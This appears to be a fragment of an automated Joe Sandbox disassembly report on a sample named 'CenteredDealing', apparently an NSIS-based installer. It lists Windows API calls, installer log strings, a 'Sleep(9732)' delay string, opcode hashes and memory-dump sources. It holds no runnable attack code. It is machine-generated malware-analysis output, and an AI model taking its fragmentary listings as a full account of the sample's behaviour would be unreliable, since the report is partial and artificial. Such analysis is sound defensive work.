                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Sleep(9732),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Sleep(9732),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(Sleep(9732),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: Sleep(9732)
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                                                                                                                • API String ID: 1033533793-945480824
                                                                                                                                                                                                                                                                • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(0001D800,00000064,?), ref: 00403295
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                                                                                                • API String ID: 3540041739-1813061909
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID: $@rD
                                                                                                                                                                                                                                                                • API String ID: 3748168415-881980237
                                                                                                                                                                                                                                                                • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                • String ID: %02x%c$...
                                                                                                                                                                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
